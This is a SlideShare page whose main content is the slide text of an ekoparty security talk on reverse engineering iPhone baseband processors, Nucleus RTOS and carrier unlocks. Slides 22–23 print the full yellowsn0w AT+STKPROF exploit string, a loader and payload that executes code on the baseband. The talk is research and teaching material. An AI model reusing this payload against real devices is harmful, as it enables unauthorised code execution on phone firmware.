U-Boot Porting on New HardwareU-Boot Porting on New Hardware
U-Boot Porting on New HardwareRuggedBoardGroup
 
How to Build & Use OpenCL on Android Studio
How to Build & Use OpenCL on Android StudioHow to Build & Use OpenCL on Android Studio
How to Build & Use OpenCL on Android StudioIndustrial Technology Research Institute (ITRI)(工業技術研究院, 工研院)
 
SigfoxGettingStarted
SigfoxGettingStartedSigfoxGettingStarted
SigfoxGettingStartedAurelien Lequertier
 
SigfoxGettingStarted TechshopParis
SigfoxGettingStarted TechshopParisSigfoxGettingStarted TechshopParis
SigfoxGettingStarted TechshopParisAurelien Lequertier
 

Weitere ähnliche Inhalte

Was ist angesagt?

Frequently Asked Question (FAQ's) on ISO 26262 Functional Safety
Frequently Asked Question (FAQ's) on ISO 26262 Functional SafetyFrequently Asked Question (FAQ's) on ISO 26262 Functional Safety
Frequently Asked Question (FAQ's) on ISO 26262 Functional SafetyEmbitel Technologies (I) PVT LTD
 
LCU13: An Introduction to ARM Trusted Firmware
LCU13: An Introduction to ARM Trusted FirmwareLCU13: An Introduction to ARM Trusted Firmware
LCU13: An Introduction to ARM Trusted FirmwareLinaro
 
Introduction to char device driver
Introduction to char device driverIntroduction to char device driver
Introduction to char device driverVandana Salve
 
HKG15-505: Power Management interactions with OP-TEE and Trusted Firmware
HKG15-505: Power Management interactions with OP-TEE and Trusted FirmwareHKG15-505: Power Management interactions with OP-TEE and Trusted Firmware
HKG15-505: Power Management interactions with OP-TEE and Trusted FirmwareLinaro
 
Yocto Project Open Source Build System and Collaboration Initiative
Yocto Project Open Source Build System and Collaboration InitiativeYocto Project Open Source Build System and Collaboration Initiative
Yocto Project Open Source Build System and Collaboration InitiativeMarcelo Sanz
 
Linux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureLinux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureRyo Jin
 
LAS16-402: ARM Trusted Firmware – from Enterprise to Embedded
LAS16-402: ARM Trusted Firmware – from Enterprise to EmbeddedLAS16-402: ARM Trusted Firmware – from Enterprise to Embedded
LAS16-402: ARM Trusted Firmware – from Enterprise to EmbeddedLinaro
 
Test summary Report :A Detailed Guide
Test summary Report :A Detailed GuideTest summary Report :A Detailed Guide
Test summary Report :A Detailed GuideProfessional QA
 
Adaptive AUTOSAR - The New AUTOSAR Architecture
Adaptive AUTOSAR - The New AUTOSAR ArchitectureAdaptive AUTOSAR - The New AUTOSAR Architecture
Adaptive AUTOSAR - The New AUTOSAR ArchitectureAdaCore
 
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"Alexander Much
 
Quick and Easy Device Drivers for Embedded Linux Using UIO
Quick and Easy Device Drivers for Embedded Linux Using UIOQuick and Easy Device Drivers for Embedded Linux Using UIO
Quick and Easy Device Drivers for Embedded Linux Using UIOChris Simmonds
 
Develop Your Own Operating Systems using Cheap ARM Boards
Develop Your Own Operating Systems using Cheap ARM BoardsDevelop Your Own Operating Systems using Cheap ARM Boards
Develop Your Own Operating Systems using Cheap ARM BoardsNational Cheng Kung University
 
LCU14 500 ARM Trusted Firmware
LCU14 500 ARM Trusted FirmwareLCU14 500 ARM Trusted Firmware
LCU14 500 ARM Trusted FirmwareLinaro
 
Linux Char Device Driver
Linux Char Device DriverLinux Char Device Driver
Linux Char Device DriverGary Yeh
 
U-Boot Porting on New Hardware
U-Boot Porting on New HardwareU-Boot Porting on New Hardware
U-Boot Porting on New HardwareRuggedBoardGroup
 

Was ist angesagt? (20)

Frequently Asked Question (FAQ's) on ISO 26262 Functional Safety
Frequently Asked Question (FAQ's) on ISO 26262 Functional SafetyFrequently Asked Question (FAQ's) on ISO 26262 Functional Safety
Frequently Asked Question (FAQ's) on ISO 26262 Functional Safety
 
LCU13: An Introduction to ARM Trusted Firmware
LCU13: An Introduction to ARM Trusted FirmwareLCU13: An Introduction to ARM Trusted Firmware
LCU13: An Introduction to ARM Trusted Firmware
 
Qemu Pcie
Qemu PcieQemu Pcie
Qemu Pcie
 
Introduction to char device driver
Introduction to char device driverIntroduction to char device driver
Introduction to char device driver
 
HKG15-505: Power Management interactions with OP-TEE and Trusted Firmware
HKG15-505: Power Management interactions with OP-TEE and Trusted FirmwareHKG15-505: Power Management interactions with OP-TEE and Trusted Firmware
HKG15-505: Power Management interactions with OP-TEE and Trusted Firmware
 
Audio Drivers
Audio DriversAudio Drivers
Audio Drivers
 
Yocto Project Open Source Build System and Collaboration Initiative
Yocto Project Open Source Build System and Collaboration InitiativeYocto Project Open Source Build System and Collaboration Initiative
Yocto Project Open Source Build System and Collaboration Initiative
 
Linux device drivers
Linux device drivers Linux device drivers
Linux device drivers
 
Linux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureLinux on ARM 64-bit Architecture
Linux on ARM 64-bit Architecture
 
LAS16-402: ARM Trusted Firmware – from Enterprise to Embedded
LAS16-402: ARM Trusted Firmware – from Enterprise to EmbeddedLAS16-402: ARM Trusted Firmware – from Enterprise to Embedded
LAS16-402: ARM Trusted Firmware – from Enterprise to Embedded
 
U boot-boot-flow
U boot-boot-flowU boot-boot-flow
U boot-boot-flow
 
Test summary Report :A Detailed Guide
Test summary Report :A Detailed GuideTest summary Report :A Detailed Guide
Test summary Report :A Detailed Guide
 
Adaptive AUTOSAR - The New AUTOSAR Architecture
Adaptive AUTOSAR - The New AUTOSAR ArchitectureAdaptive AUTOSAR - The New AUTOSAR Architecture
Adaptive AUTOSAR - The New AUTOSAR Architecture
 
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"
 
Quick and Easy Device Drivers for Embedded Linux Using UIO
Quick and Easy Device Drivers for Embedded Linux Using UIOQuick and Easy Device Drivers for Embedded Linux Using UIO
Quick and Easy Device Drivers for Embedded Linux Using UIO
 
Develop Your Own Operating Systems using Cheap ARM Boards
Develop Your Own Operating Systems using Cheap ARM BoardsDevelop Your Own Operating Systems using Cheap ARM Boards
Develop Your Own Operating Systems using Cheap ARM Boards
 
LCU14 500 ARM Trusted Firmware
LCU14 500 ARM Trusted FirmwareLCU14 500 ARM Trusted Firmware
LCU14 500 ARM Trusted Firmware
 
Linux Char Device Driver
Linux Char Device DriverLinux Char Device Driver
Linux Char Device Driver
 
U-Boot Porting on New Hardware
U-Boot Porting on New HardwareU-Boot Porting on New Hardware
U-Boot Porting on New Hardware
 
How to Build & Use OpenCL on Android Studio
How to Build & Use OpenCL on Android StudioHow to Build & Use OpenCL on Android Studio
How to Build & Use OpenCL on Android Studio
 

Ähnlich wie The Baseband Playground

SigfoxGettingStarted TechshopParis
SigfoxGettingStarted TechshopParisSigfoxGettingStarted TechshopParis
SigfoxGettingStarted TechshopParisAurelien Lequertier
 
SRv6 On-Path Delay Measurement with Anomaly Detection OPSAWG WG
SRv6 On-Path Delay Measurement with Anomaly Detection OPSAWG WGSRv6 On-Path Delay Measurement with Anomaly Detection OPSAWG WG
SRv6 On-Path Delay Measurement with Anomaly Detection OPSAWG WGThomasGraf42
 
QNAP for IoT
QNAP for IoTQNAP for IoT
QNAP for IoTqnapivan
 
Everything you never wanted to know about mobile voip
Everything you never wanted to know about mobile voipEverything you never wanted to know about mobile voip
Everything you never wanted to know about mobile voipPaloSanto Solutions
 
IPv6 Security - Myths and Reality
IPv6 Security - Myths and RealityIPv6 Security - Myths and Reality
IPv6 Security - Myths and RealitySwiss IPv6 Council
 
Dick james confab14
Dick james confab14Dick james confab14
Dick james confab14JESUSMBG
 
BGP Flowspec (RFC5575) Case study and Discussion
BGP Flowspec (RFC5575) Case study and DiscussionBGP Flowspec (RFC5575) Case study and Discussion
BGP Flowspec (RFC5575) Case study and DiscussionAPNIC
 
ハードウェアメーカーならでは(笑)実機あり! Azure IoT Edgeデバイス / Edge Server Update
ハードウェアメーカーならでは(笑)実機あり! Azure IoT Edgeデバイス / Edge Server Updateハードウェアメーカーならでは(笑)実機あり! Azure IoT Edgeデバイス / Edge Server Update
ハードウェアメーカーならでは(笑)実機あり! Azure IoT Edgeデバイス / Edge Server UpdateNaoki Yonezu
 
Oleg Kupreev - 802.11 tricks and threats
Oleg Kupreev - 802.11 tricks and threatsOleg Kupreev - 802.11 tricks and threats
Oleg Kupreev - 802.11 tricks and threatsDefcon Moscow
 
Cellular technology with Embedded Linux - COSCUP 2016
Cellular technology with Embedded Linux - COSCUP 2016Cellular technology with Embedded Linux - COSCUP 2016
Cellular technology with Embedded Linux - COSCUP 2016SZ Lin
 
SigfoxGettingStarted October2018
SigfoxGettingStarted October2018SigfoxGettingStarted October2018
SigfoxGettingStarted October2018Aurelien Lequertier
 
Fuzzing Janus @ IPTComm 2019
Fuzzing Janus @ IPTComm 2019Fuzzing Janus @ IPTComm 2019
Fuzzing Janus @ IPTComm 2019Lorenzo Miniero
 
Pharo IoT: Using Pharo to playing with GPIOs and sensors on IoT devices remotely
Pharo IoT: Using Pharo to playing with GPIOs and sensors on IoT devices remotelyPharo IoT: Using Pharo to playing with GPIOs and sensors on IoT devices remotely
Pharo IoT: Using Pharo to playing with GPIOs and sensors on IoT devices remotelyESUG
 
OSINT RF Reverse Engineering by Marc Newlin
OSINT RF Reverse Engineering by Marc NewlinOSINT RF Reverse Engineering by Marc Newlin
OSINT RF Reverse Engineering by Marc NewlinEC-Council
 
Bsides Puerto Rico-2017
Bsides Puerto Rico-2017Bsides Puerto Rico-2017
Bsides Puerto Rico-2017Price McDonald
 

Ähnlich wie The Baseband Playground (20)

SigfoxGettingStarted
SigfoxGettingStartedSigfoxGettingStarted
SigfoxGettingStarted
 
SigfoxGettingStarted TechshopParis
SigfoxGettingStarted TechshopParisSigfoxGettingStarted TechshopParis
SigfoxGettingStarted TechshopParis
 
SRv6 On-Path Delay Measurement with Anomaly Detection OPSAWG WG
SRv6 On-Path Delay Measurement with Anomaly Detection OPSAWG WGSRv6 On-Path Delay Measurement with Anomaly Detection OPSAWG WG
SRv6 On-Path Delay Measurement with Anomaly Detection OPSAWG WG
 
QNAP for IoT
QNAP for IoTQNAP for IoT
QNAP for IoT
 
Everything you never wanted to know about mobile voip
Everything you never wanted to know about mobile voipEverything you never wanted to know about mobile voip
Everything you never wanted to know about mobile voip
 
Sigfox Euratech Workshop
Sigfox Euratech WorkshopSigfox Euratech Workshop
Sigfox Euratech Workshop
 
IPv6 Security - Myths and Reality
IPv6 Security - Myths and RealityIPv6 Security - Myths and Reality
IPv6 Security - Myths and Reality
 
Dick james confab14
Dick james confab14Dick james confab14
Dick james confab14
 
BGP Flowspec (RFC5575) Case study and Discussion
BGP Flowspec (RFC5575) Case study and DiscussionBGP Flowspec (RFC5575) Case study and Discussion
BGP Flowspec (RFC5575) Case study and Discussion
 
ハードウェアメーカーならでは(笑)実機あり! Azure IoT Edgeデバイス / Edge Server Update
ハードウェアメーカーならでは(笑)実機あり! Azure IoT Edgeデバイス / Edge Server Updateハードウェアメーカーならでは(笑)実機あり! Azure IoT Edgeデバイス / Edge Server Update
ハードウェアメーカーならでは(笑)実機あり! Azure IoT Edgeデバイス / Edge Server Update
 
Ethernet basics
Ethernet basicsEthernet basics
Ethernet basics
 
Oleg Kupreev - 802.11 tricks and threats
Oleg Kupreev - 802.11 tricks and threatsOleg Kupreev - 802.11 tricks and threats
Oleg Kupreev - 802.11 tricks and threats
 
Cellular technology with Embedded Linux - COSCUP 2016
Cellular technology with Embedded Linux - COSCUP 2016Cellular technology with Embedded Linux - COSCUP 2016
Cellular technology with Embedded Linux - COSCUP 2016
 
SigfoxGettingStarted October2018
SigfoxGettingStarted October2018SigfoxGettingStarted October2018
SigfoxGettingStarted October2018
 
Fuzzing Janus @ IPTComm 2019
Fuzzing Janus @ IPTComm 2019Fuzzing Janus @ IPTComm 2019
Fuzzing Janus @ IPTComm 2019
 
Pharo IoT: Using Pharo to playing with GPIOs and sensors on IoT devices remotely
Pharo IoT: Using Pharo to playing with GPIOs and sensors on IoT devices remotelyPharo IoT: Using Pharo to playing with GPIOs and sensors on IoT devices remotely
Pharo IoT: Using Pharo to playing with GPIOs and sensors on IoT devices remotely
 
PHARO IOT
PHARO IOTPHARO IOT
PHARO IOT
 
20190423 meetup japan_public
20190423 meetup japan_public20190423 meetup japan_public
20190423 meetup japan_public
 
OSINT RF Reverse Engineering by Marc Newlin
OSINT RF Reverse Engineering by Marc NewlinOSINT RF Reverse Engineering by Marc Newlin
OSINT RF Reverse Engineering by Marc Newlin
 
Bsides Puerto Rico-2017
Bsides Puerto Rico-2017Bsides Puerto Rico-2017
Bsides Puerto Rico-2017
 

Kürzlich hochgeladen

Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 

Kürzlich hochgeladen (20)

Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 

The Baseband Playground

  • 1. BASEBAND PLAYGROUND ekoparty Security Conference 7° edición Luis Miras luis@ringzero.net @_luism
  • 2. Thanks   This  talk  is  based  on  unlocks  and  informa4on   provided  by  the  following   •  Musclenerd                                                      @MuscleNerd   •  iPhone  Dev  Team                                  @iphone_dev   •  Geohot                                                      hAp://geohot.com   •  iPhone  Wiki              hAp://theiphonewiki.com  
  • 3. What  is  talk  about   •  Exploring  basebands  via  code  injec4on   •  Crea4ng  a  development  environment   •  Reverse  Engineering,  sta4c  and  dynamic   •  Code  patching  techniques  
  • 4. What  is  not  covered   •  Remote  exploita4on.  See:   –   Ralf-­‐Philipp  Weinmann  “The  Baseband   Apocalypse”   •  hAp://www.youtube.com/watch?v=CPPQ8vA6cRc   –  Grugq  “Base  Jumping”   •  hAps://media.blackhat.com/bh-­‐ad-­‐10/Grugq/BlackHat-­‐ AD-­‐2010-­‐Gurgq-­‐Base-­‐Jumping-­‐slides.pdf   •  Non  public  unlocks  
  • 5. Contents   •  Baseband  Background   •  Sta4c  Reverse  Engineering   •  Development  Environment   •  Dynamic  Reverse  Engineering   •  Patching  Code   •  Conclusion  
  • 7. What  is  a  baseband?   •  Baseband  is  short  for  baseband  processor.   •  For  this  talk  only  talking  about  smartphones   •  Can  be  a  separate  chip  or  a  separate  core  
  • 8. What  is  a  baseband?   •  Controls/Interfaces  with  hardware   –  Audio,  voice  and  mp3  codecs   –  Video  display   –  Camera   –  USB   –  GPS   –  WiFi   –  Bluetooth,  etc  
  • 9. What  is  a  baseband?   •  Provides  communica4on  protocols   –  GSM   –  GPRS   –  Edge   –  UMTS  
  • 10. What  is  a  baseband?   •  Generally  ARM  core   •  Basebands  run  small  RTOS   –  iPhone,  iPhone  3G,  iPhone  3GS  uses  Nucleus   –  iPhone  4  uses  ThreadX   –  Qualcomm  chips  use  OKL4   •  OsmocoBB   –  Open  Source  GSM  implementa4on   –  Motorola  C123  and  friends  (feature  phone)   –  hAp://bb.osmocom.org  
  • 11. What  is  a  baseband?   •  Applica4on/Baseband  communica4on   –  Shared  memory   –  AT  commands  over  high  speed  serial  lines  
  • 12. What  is  a  baseband?   •  Applica4on/Baseband  communica4on   –  Shared  memory   –  AT  commands  over  high  speed  serial  lines   AT  commands  ?  
  • 13. What  is  a  baseband?   •  Applica4on/Baseband  communica4on   –  Shared  memory   –  AT  commands  over  high  speed  serial  lines  
  • 14. What  is  a  baseband?   •  Applica4on/Baseband  communica4on   –  Shared  memory   –  AT  commands  over  high  speed  serial  lines   at+cnum +CNUM: "","15555551212",129 OK at+cgsn 011770000000000 OK
  • 15. What  is  an  unlock?   •  A  carrier  lock  prevents  phone’s  use  on  other   networks.   •  An  unlock  removes  this  restric4on.   •  Some  phones  require  numeric  password  to   unlock.   •  Other  unlocks  patch  bootloader/firmware,   removing  checks.  ex.  original  iPhone  
  • 16. iPhone  3G  unlock     •  First  unlock  was  released  by  iPhone  Dev  Team,   yellowsn0w.   •  It  exploits  an  AT  command  parser  vuln   execu4ng  arbitrary  code  in  the  baseband   •  Payload  uses  Nucleus  API  to  perform  unlock   •  The  unlock  is  not  permanent.  
  • 17. Infineon  X-­‐Gold  608  /  XMM  6080   •  Baseband  used  in  iPhone  3G(S)  and  iPad1  3G   •  ARM  926  Core   •  Nucleus  RTOS   •  Selected  as  test  case  because  of  unlock   (exploit)  availability  
  • 18. Baseband  Unlocks   Unlock   Baseband(s)   Firmware     Vector   yellowsn0w  [1]   02.28.00   2.2                                  3G   AT+STKPROF   ultrasn0w        [1]   04.26.08   3.0,  3.0.1            3G(S)   AT+XLOCK   05.11.07   3.1,  3.1.2            3G(S)   AT+XAPP   05.12.01   3.1.3                            3G(S)   AT+XAPP   05.13.04   4.0  –  4.0.2        3G(S)   AT+XAPP   06.15.00  [3]   3.2  –  3.2.2        iPad1   AT+XAPP   purplesn0w  [2]   04.26.08   3.0,  3.0.1            3G(S)   AT+XLOCK   blacksn0w        [2]   05.11.07   3.1,  3.1.2            3G(S)   AT+XEMM  (heap)   1.  iPhone  dev  team   2.  Geohot   3.  iPad1  baseband.  iPhone  3G(S)  will  lose  GPS  func4onality   NOTE:  Downgrades  are  generally  not  possible  except  for  a  specific  early   release  3G  bootloader.  
  • 19. What  is  Nucleus?   •  It  is  a  RTOS  developed  by  Mentor  Graphics.   –  Downloadable  trial  available   •  Closed  source,  but  clients  get  source  code.   •  Runs  on  mul4ple  CPUs   •  2.84  Billion  devices  by  end  of  2010   •  C/C++  development  environment  using  Code   Sourcery  tools  
  • 21. AT+STKPROF  Exploit   •  This  is  the  vector  yellowsn0w  used.   •  Source  code  was  released   •  Payload  disassembly  provided:                hAp://theiphonewiki.com/wiki/index.php?4tle=Yellowsn0w   •  I  will  highlight  some  interes4ng  areas   •  Exploit  has  3  parts   –  loader   –  stage2   –  payload  
  • 22. AT+STKPROF   at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf 9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8 905120000000001010101020202020611301000c000000";"x10x32x0Fx27 xBAx43x17x1Cx0ExA4x0BxA5x01x35x21x78x78x29x0CxD0 xA8x47x0Bx01x61x78xA8x47xC0x46xC0x46xC0x46xC0x46 xC9x18x11x70x02x34x01x32xEFxE7xC0x46xC0x46x01x37 x38x47x30x30x41x29x01xDA09pG79pG024803A1013101601FBD0000 4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047 071CC56080204000A047802214495200144B041C9847099B0193442303930A23 013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1 0B4908980B4B984703E00B490898094B98470BB0F0BD000044B33B40AC201420 641A0100A0583C20481A010040B53F20541A010000DD4620581A010064657674 65616D31000000004F4B21004552524F522025640000000030B5114D85B0114B 281C6946FF229847009B0D2B11D101990D4B0A681A6004334A681A608A680B4B 13600B4B53600B4B93600123CB6020230093281C6946FF22074B9847DFE70000 5427234098591620BC792F4000FF0001010402040304040468D53E20xx”
  • 23. AT+STKPROF   at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf <- loader 9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8 905120000000001010101020202020611301000c000000";"x10x32x0Fx27 xBAx43x17x1Cx0ExA4x0BxA5x01x35x21x78x78x29x0CxD0 xA8x47x0Bx01x61x78xA8x47xC0x46xC0x46xC0x46xC0x46 xC9x18x11x70x02x34x01x32xEFxE7xC0x46xC0x46x01x37 x38x47x30x30x41x29x01xDA09pG79pG024803A1013101601FBD0000 4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047 071CC56080204000A047802214495200144B041C9847099B0193442303930A23 013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1 0B4908980B4B984703E00B490898094B98470BB0F0BD000044B33B40AC201420 641A0100A0583C20481A010040B53F20541A010000DD4620581A010064657674 65616D31000000004F4B21004552524F522025640000000030B5114D85B0114B 281C6946FF229847009B0D2B11D101990D4B0A681A6004334A681A608A680B4B 13600B4B53600B4B93600123CB6020230093281C6946FF22074B9847DFE70000 5427234098591620BC792F4000FF0001010402040304040468D53E20xx”
